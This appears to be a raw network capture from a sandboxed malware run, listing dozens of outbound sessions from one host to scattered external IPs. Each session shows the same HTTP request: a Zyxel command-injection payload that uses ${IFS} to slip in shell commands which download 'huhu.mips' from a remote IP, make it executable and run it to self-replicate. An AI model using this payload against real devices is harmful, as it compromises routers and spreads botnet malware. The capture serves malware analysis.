                                                        Feb 2, 2024 06:20:57.682667971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1460192.168.2.1440082157.166.47.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682715893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1461192.168.2.1442178171.53.244.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682746887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1462192.168.2.1450346134.197.19.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682774067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1463192.168.2.1445328184.171.108.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682804108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1464192.168.2.143918647.151.209.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682843924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1465192.168.2.1442380105.159.248.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682888985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1466192.168.2.145633467.146.229.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682920933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1467192.168.2.14468482.172.182.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682964087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1468192.168.2.143720847.21.118.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683020115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1469192.168.2.1434040144.182.72.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683038950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1470192.168.2.1440206194.207.57.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683085918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1471192.168.2.144098636.159.224.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683115959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1472192.168.2.145236497.82.196.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683157921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1473192.168.2.144334060.197.53.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683182001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1474192.168.2.145268666.60.66.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683207035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1475192.168.2.1436886181.251.7.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683260918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1476192.168.2.1451442130.127.171.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683300972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1477192.168.2.144495025.102.157.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683327913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1478192.168.2.1455182222.222.178.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683377981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1479192.168.2.14555329.107.44.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683423042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1480192.168.2.1460660158.71.253.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683449984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1481192.168.2.1443970157.146.98.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683501959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1482192.168.2.145372682.156.146.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683552027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1483192.168.2.1434276217.30.232.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683597088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1484192.168.2.1446656174.15.227.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683634996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1485192.168.2.145263859.160.173.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683657885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1486192.168.2.144169276.35.164.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683720112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1487192.168.2.1449970172.34.39.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683754921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1488192.168.2.143538677.111.183.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683794975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1489192.168.2.1459014203.247.204.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683825970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1490192.168.2.1460088183.93.106.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683851957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1491192.168.2.1447276173.204.221.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683883905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1492192.168.2.145305866.189.106.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683952093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1493192.168.2.1445938123.2.174.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.683986902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1494192.168.2.1443040203.241.232.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684010983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1495192.168.2.1439054140.238.165.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684062958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1496192.168.2.145579812.46.185.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684112072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1497192.168.2.1456368111.14.195.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684160948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1498192.168.2.145472650.56.27.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684199095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1499192.168.2.1460760169.189.251.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684247971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1500192.168.2.1436718189.160.76.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684267044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1501192.168.2.144628295.229.148.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.684324026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1502192.168.2.1452646118.28.246.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.685655117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1503192.168.2.1442614108.25.46.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.686147928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1504192.168.2.1457020129.101.164.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.687587976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1505192.168.2.1439422124.229.8.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.687612057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1506192.168.2.1441682184.251.183.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.687671900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1507192.168.2.145009492.98.177.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695512056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1508192.168.2.144556034.143.121.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695537090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1509192.168.2.1449680195.22.223.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695579052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1510192.168.2.144256482.44.113.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695641994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1511192.168.2.145590662.204.18.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695712090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1512192.168.2.1453566106.157.187.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695746899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1513192.168.2.1437702179.239.204.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695746899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1514192.168.2.1442542130.253.220.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695780993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1515192.168.2.1433410125.248.5.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695837021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1516192.168.2.1433798121.59.124.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695902109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1517192.168.2.144101817.118.213.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695905924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1518192.168.2.145659231.171.162.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.695991993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1519192.168.2.1453128186.149.168.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696026087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1520192.168.2.144577088.144.245.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696050882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1521192.168.2.144511662.152.129.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696053982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1522192.168.2.1441316134.201.203.57443
                                                        TimestampBytes transferredDirectionData
